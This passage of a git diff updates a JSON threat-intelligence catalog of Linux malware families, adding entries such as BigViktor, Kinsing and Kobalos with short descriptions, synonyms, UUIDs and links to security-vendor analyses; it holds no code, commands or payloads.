@@ -1244,9 +2287,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", - "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", - "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/" + "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/", + "https://blog.netlab.360.com/the-gafgyt-variant-vbot-and-its-31-campaigns/", + "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", + "https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218", + "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/" ], "synonyms": [ "Gafgyt", @@ -1273,6 +2319,49 @@ "uuid": "d8dd47a5-85fe-4f07-89dc-00301468d209", "value": "BCMPUPnP_Hunter" }, + { + "description": "A DDoS bot abusing CVE-2020-8515 to target DrayTek Vigor routers. It uses a wordlist-based DGA to generate its C&C domains.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bigviktor", + "https://blog.netlab.360.com/bigviktor-dga-botnet/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "901ab128-2d23-41d7-a9e7-6a34e281804e", + "value": "BigViktor" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackrota", + "https://www.kryptoslogic.com/blog/2020/12/automated-string-de-gobfuscation/", + "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go-en/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a30aedcc-562e-437a-827c-55bc00cf3506", + "value": "Blackrota" + }, + { + "description": "This is a pentesting tool and according to the author, \"BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies.\".\r\n\r\nIt has been observed being used by TeamTNT in their activities for spreading crypto-mining malware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.botb", + "https://github.com/brompwnie/botb" + ], + "synonyms": [ + "BOtB" + ], + "type": [] + }, + "uuid": "57c9ab70-7133-441a-af66-10c0e4eb898b", + "value": "Break out the Box" + }, { "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech", "meta": { @@ -1292,6 +2381,45 @@ "uuid": "bb9eaaec-97c9-4014-94dd-129cecf31ff0", "value": "CDorked" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdrthief", + "https://www.welivesecurity.com/2020/09/10/who-callin-cdrthief-linux-voip-softswitches/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "27d06ac9-42c4-433a-b1d7-660710d9e8df", + "value": "CDRThief" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cephei", + "https://cybersecurity.att.com/blogs/labs-research/malware-using-new-ezuri-memory-loader" + ], + "synonyms": [], + "type": [] + }, + "uuid": "baa0704b-50d8-48af-91e1-049f30f422cc", + "value": "Cephei" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cetus", + "https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7a226df2-9599-4002-9a38-b044e16f76a9", + "value": "Cetus" + }, { "description": "", "meta": { @@ -1306,6 +2434,37 @@ "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b", "value": "Chapro" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cloud_snooper", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf" + ], + "synonyms": [ + "Snoopy" + ], + "type": [] + }, + "uuid": "0b1c514d-f617-4380-a28c-a1ed305a7538", + "value": "Cloud Snooper" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.corona", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "591b15c3-ab72-49ce-981a-e6e21e506e52", + "value": "Corona DDOS Bot" + }, { "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.", "meta": { @@ -1336,17 +2495,94 @@ "uuid": "196b20ec-c3d1-4136-ab94-a2a6cc150e74", "value": "Cr1ptT0r" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dacls", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", + "https://blog.netlab.360.com/dacls-the-dual-platform-rat/", + "https://www.sygnia.co/mata-framework", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2e5e2a7e-4ee5-4954-9c92-e9b21649ae1b", + "value": "Dacls (ELF)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.darknexus", + "https://www.stratosphereips.org/blog/2020/6/8/dark-nexus-the-old-the-new-and-the-ugly" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dfba0c8f-9d06-448b-817e-6fffa1b22cb9", + "value": "Dark Nexus" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddoor", + "https://github.com/rek7/ddoor" + ], + "synonyms": [], + "type": [] + }, + "uuid": "07f48866-647c-46b0-a0d4-29c81ad488a8", + "value": "ddoor" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.doki", + "https://www.securecoding.com/blog/all-about-doki-malware/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a5446b35-8613-4121-ada4-c0b1d6f72851", + "value": "Doki" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.doublefantasy", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://www.antiy.com/response/FROM_EQUATION_TO_EQUATIONS.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a41d8c89-8229-4936-96c2-4b194ebaf858", + "value": "DoubleFantasy (ELF)" + }, { "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", - "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", + "https://security.web.cern.ch/security/advisories/windigo/windigo.shtml", + "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/", "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/", "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", - "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/" + "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/" ], "synonyms": [], "type": [] @@ -1354,6 +2590,22 @@ "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5", "value": "Ebury" }, + { + "description": "The latest in this long line of Mirai scourges is a new variant named Echobot. Coming to life in mid-May, the malware was first described by Palo Alto Networks in a report published at the start of June, and then again in a report by security researchers from Akamai, in mid-June.\r\n\r\nWhen it was first spotted by Palo Alto Networks researchers in early June, Echobot was using exploits for 18 vulnerabilities. In the Akamai report, a week later, Echobot was at 26.\r\n\r\nhttps://www.zdnet.com/article/new-echobot-malware-is-a-smorgasbord-of-vulnerabilities", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.echobot", + "https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada", + "https://www.bleepingcomputer.com/news/security/new-echobot-botnet-variant-uses-over-50-exploits-to-propagate/", + "https://blogs.akamai.com/sitr/2019/06/latest-echobot-26-infection-vectors.html", + "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "040ac9c6-e3ab-4b51-88a9-5380101c74f8", + "value": "Echobot" + }, { "description": "", "meta": { @@ -1367,6 +2619,38 @@ "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", "value": "Erebus (ELF)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilgnome", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", + "https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "149e693c-4b51-4143-9061-6a8698b0e7f5", + "value": "EvilGnome" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.exaramel", + "https://www.wired.com/story/sandworm-centreon-russia-hack/", + "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", + "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://twitter.com/craiu/status/1361581668092493824", + "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1e0540f3-bad3-403f-b8ed-ce40a276559e", + "value": "Exaramel (ELF)" + }, { "description": "", "meta": { @@ -1385,7 +2669,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot", - "https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/" + "https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html", + "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html", + "https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/", + "https://blog.netlab.360.com/fbot-is-now-riding-the-traffic-and-transportation-smart-devices-en/" ], "synonyms": [], "type": [] @@ -1393,6 +2680,99 @@ "uuid": "501e5434-5796-4d63-8539-d99ec48119c2", "value": "FBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.finfisher", + "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", + "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "44018d71-25fb-4959-b61e-d7af97c85131", + "value": "FinFisher (ELF)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.floodor", + "https://github.com/Thibault-69/Floodor" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ac30f2be-8153-4588-b29c-5e5863792930", + "value": "floodor" + }, + { + "description": "Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine\u2019s disk. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog", + "https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b43b7b4a-9cf4-4f98-b4d2-617a7d84bfa7", + "value": "FritzFrog" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gitpaste12", + "https://blogs.juniper.net/en-us/threat-research/gitpaste-12" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ffd09324-b585-49c0-97e5-536d386f49a5", + "value": "Gitpaste-12" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.godlua", + "https://blog.netlab.360.com/an-analysis-of-godlua-backdoor-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f3cb0a78-1608-44b1-9949-c6addf6c13ce", + "value": "Godlua" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gosh", + "https://twitter.com/IntezerLabs/status/1291355808811409408" + ], + "synonyms": [], + "type": [] + }, + "uuid": "931f57f9-1edd-47b8-bf80-ae7190434558", + "value": "GOSH" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.greedyantd", + "https://www.intezer.com/blog-technical-analysis-cryptocurrency-mining-war-on-the-cloud/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6aee7daf-9f63-4a70-bfe5-9c95cbdcb1e3", + "value": "GreedyAntd" + }, { "description": "", "meta": { @@ -1412,7 +2792,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime", "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", + "https://par.nsf.gov/servlets/purl/10096257", "https://x86.re/blog/hajime-a-follow-up/", "http://blog.netlab.360.com/hajime-status-report-en/", "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things", @@ -1439,6 +2819,49 @@ "uuid": "0839c28a-ea11-44d4-93d1-24b246ef6743", "value": "Hakai" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.handymannypot", + "https://twitter.com/liuya0904/status/1171633662502350848" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0b323b91-ad57-4127-99d1-6a2485be70df", + "value": "HandyMannyPot" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hand_of_thief", + "https://blog.avast.com/2013/08/27/linux-trojan-hand-of-thief-ungloved/", + "https://web.archive.org/web/20130815040638/https://blogs.rsa.com/thieves-reaching-for-linux-hand-of-thief-trojan-targets-linux-inth3wild/" + ], + "synonyms": [ + "Hanthie" + ], + "type": [] + }, + "uuid": "db3e17f0-677b-4bdb-bc26-25e62a74673d", + "value": "Hand of Thief" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiddenwasp", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", + "https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ae00d48d-c515-4ca9-a29c-8c53a78f8c73", + "value": "HiddenWasp" + }, { "description": "", "meta": { @@ -1462,6 +2885,19 @@ "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b", "value": "Hide and Seek" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.icnanker", + "https://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cd9f128b-6502-4e1b-a5b3-25f3c7f01ca3", + "value": "Icnanker" + }, { "description": "", "meta": { @@ -1469,18 +2905,36 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper", "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/", "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm", - "https://research.checkpoint.com/new-iot-botnet-storm-coming/", - "https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/" + "https://research.checkpoint.com/new-iot-botnet-storm-coming/" ], "synonyms": [ "IoTroop", - "Reaper" + "Reaper", + "iotreaper" ], "type": [] }, "uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2", "value": "IoT Reaper" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ipstorm", + "https://www.anomali.com/blog/the-interplanetary-storm-new-malware-in-wild-using-interplanetary-file-systems-ipfs-p2p-network", + "https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/" + ], + "synonyms": [ + "InterPlanetary Storm" + ], + "type": [] + }, + "uuid": "a24f9c4b-1fa7-4da2-9929-064345389e67", + "value": "IPStorm (ELF)" + }, { "description": "", "meta": { @@ -1494,12 +2948,30 @@ "uuid": "6a4365fc-8448-4270-ba93-0341788d004b", "value": "JenX" }, + { + "description": "Surfaced in late April 2020, Intezer describes Kaiji as a DDoS malware written in Go that spreads through SSH brute force attacks. Recovered function names are an English representation of Chinese words, hinting about the origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji", + "https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "33fe7943-c1b3-48d5-b287-126390b091f0", + "value": "Kaiji" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten", - "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf" + "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf", + "https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html", + "https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/" ], "synonyms": [ "STD" @@ -1509,6 +2981,60 @@ "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12", "value": "Kaiten" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kerberods", + "https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916", + "https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/", + "https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers.html", + "https://blog.talosintelligence.com/2019/09/watchbog-patching.html", + "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e3787d95-2595-449e-8cf9-90845a9b7444", + "value": "kerberods" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://unit42.paloaltonetworks.com/cve-2020-25213/", + "https://redcanary.com/blog/kinsing-malware-citrix-saltstack/", + "https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces", + "https://twitter.com/IntezerLabs/status/1259818964848386048", + "https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743", + "https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html", + "https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability" + ], + "synonyms": [ + "h2miner" + ], + "type": [] + }, + "uuid": "ef0e3a56-e614-4dc1-bb20-0dcf7215c1ea", + "value": "Kinsing" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kobalos", + "https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/", + "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf", + "https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "201d54ae-7fb0-4522-888c-758fa9019737", + "value": "Kobalos" + }, { "description": "", "meta": { @@ -1522,6 +3048,105 @@ "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", "value": "Lady" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.leethozer", + "https://blog.netlab.360.com/the-leethozer-botnet-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e9f2857a-cb91-4715-ac8b-fdc89bc9a03e", + "value": "LeetHozer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilock", + "https://www.bleepingcomputer.com/news/security/lilocked-ransomware-actively-targeting-servers-and-web-sites/", + "https://fossbytes.com/lilocked-ransomware-infected-linux-servers/", + "https://id-ransomware.blogspot.com/2019/07/lilu-lilocked-ransomware.html" + ], + "synonyms": [ + "Lilocked", + "Lilu" + ], + "type": [] + }, + "uuid": "1328ed0d-9c1c-418b-9a96-1c538e4893bc", + "value": "LiLock" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilyofthevalley", + "https://github.com/En14c/LilyOfTheValley" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f789442f-8f50-4e55-8fbc-b93d22b5314e", + "value": "lilyofthevalley" + }, + { + "description": "BitDefender tracked the development of a Mirai-inspired botnet, dubbed LiquorBot, which seems to be actively in development and has recently incorporated Monero cryptocurrency mining features. Interestingly, LiquorBot is written in Go (also known as Golang), which offers some programming advantages over traditional C-style code, such as memory safety, garbage collection, structural typing, and even CSP-style concurrency. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.liquorbot", + "https://www.zdnet.com/article/naive-iot-botnet-wastes-its-time-mining-cryptocurrency/", + "https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3fe8f3db-4861-4e78-8b60-a794fe22ae3f", + "value": "LiquorBot" + }, + { + "description": "Loader and Cleaner components used in attacks against high-performance computing centers in Europe.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.loerbas", + "https://atdotde.blogspot.com/2020/05/high-performance-hackers.html", + "https://twitter.com/nunohaien/status/1261281419483140096", + "https://www.cadosecurity.com/2020/05/16/1318/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6332d57c-c46f-4907-8dac-965b15ffbed6", + "value": "Loerbas" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.log_collector", + "https://blog.netlab.360.com/dacls-the-dual-platform-rat/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0473214a-2daa-4b5b-84bc-1bcbab11ef80", + "value": "Log Collector" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lootwodniw", + "https://twitter.com/ddash_ct/status/1326887125103616000" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cfcf8608-03e7-4a5b-a46c-af342db2d540", + "value": "Lootwodniw" + }, { "description": "Masuta takes advantage of the EDB 38722 D-Link exploit.", "meta": { @@ -1539,6 +3164,51 @@ "uuid": "b9168ff8-01df-4cd0-9f70-fe9e7a11eccd", "value": "Masuta" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.matryosh", + "https://blog.netlab.360.com/matryosh-botnet-is-spreading-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4e989704-c49f-468c-95e1-1b7c5a58b3c4", + "value": "Matryosh" + }, + { + "description": "MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. It is designed to monitor and save SMS traffic from specific phone numbers, IMSI numbers and keywords for subsequent theft.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.messagetap", + "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a07d6748-3557-41ac-b55b-f4348dc2a3c7", + "value": "MESSAGETAP" + }, + { + "description": "A x64 ELF file infector with non-destructive payload.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.midrashim", + "https://www.guitmz.com/linux-midrashim-elf-virus/", + "https://github.com/guitmz/midrashim" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fe220358-7118-4feb-b43e-cbdaf2ea09dc", + "value": "Midrashim" + }, { "description": "", "meta": { @@ -1553,22 +3223,35 @@ "value": "MiKey" }, { - "description": "", + "description": "Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means \"future\" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on \"Hack Forums\" many variants of the Mirai family appeared, infecting mostly home networks all around the world.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai", "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", + "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html", "http://osint.bambenekconsulting.com/feeds/", - "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", + "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet", "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", + "https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/", + "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/", + "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/", + "https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/", "https://isc.sans.edu/diary/22786", "https://github.com/jgamblin/Mirai-Source-Code", "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/", - "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/", + "https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/", + "https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html", + "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/", + "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/", + "https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet" + ], + "synonyms": [ + "Katana" ], - "synonyms": [], "type": [] }, "uuid": 